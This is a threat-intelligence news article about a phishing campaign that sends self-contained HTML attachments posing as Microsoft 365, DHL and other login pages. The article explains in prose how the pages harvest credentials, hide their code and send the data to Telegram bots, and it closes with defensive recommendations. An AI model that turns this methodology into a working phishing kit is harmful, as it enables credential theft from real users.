Cybercriminals Exploit Popular Brands in Sophisticated Phishing Campaign
A new phishing campaign has emerged, targeting organizations across Central and Eastern Europe by impersonating well-known global brands to deceive users into surrendering their login credentials. This attack utilizes self-contained HTML files delivered as email attachments, eliminating the need for external server hosting or suspicious URLs that traditional security systems typically detect.
Once opened, these attachments present convincing fake login pages for brands including Microsoft 365, Adobe, WeTransfer, FedEx, and DHL, creating a seamless user experience designed to bypass conventional email security controls.
Attack Methodology
The attackers demonstrate a clear understanding of regional business practices. They distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations through RFC-compliant filenames such as RFQ_4460-INQUIRY.HTML. This targeted approach focuses on industries with regular procurement workflows, including agriculture, automotive, construction, and education sectors, primarily in the Czech Republic, Slovakia, Hungary, and Germany.
Cyble security analysts identified that the campaign’s success relies on embedded JavaScript within HTML attachments that captures credentials and transmits them directly to attacker-controlled Telegram bots rather than traditional command-and-control servers. Upon execution, victims encounter a carefully replicated login interface displaying brand-authentic branding with blurred background images for added legitimacy.
Technical Analysis
The credential capture mechanism functions by reading form field values and constructing API requests to send stolen data directly through the Telegram Bot API. Technical analysis reveals two distinct implementation approaches among analyzed samples. The first variant implements CryptoJS AES encryption for obfuscation while capturing email addresses, passwords, IP addresses, and user-agent information before redirecting victims to legitimate company domains.
The second sample employs more advanced anti-forensics techniques, blocking keyboard combinations including F12, Ctrl+U/S/C/A/X, and right-click context menus to prevent code inspection and analysis. The exfiltration function demonstrates technical sophistication by utilizing the native Fetch API for cleaner code implementation rather than jQuery dependencies.
The JavaScript constructs POST requests containing harvested credentials sent via HTTPS to api.telegram.org/bot endpoints with hardcoded bot tokens and chat IDs embedded directly in the payload. This approach deliberately avoids suspicious network patterns while maintaining operational resilience through decentralized bot infrastructure.
Recommendations
Organizations should prioritize deploying HTML attachment controls and implementing content inspection policies to block or sandbox potentially malicious HTML files before delivery to end users. Security teams are advised to hunt for api.telegram.org POST activity originating from client systems and conduct retroactive threat hunts for identified indicators to assess whether credentials have been compromised.
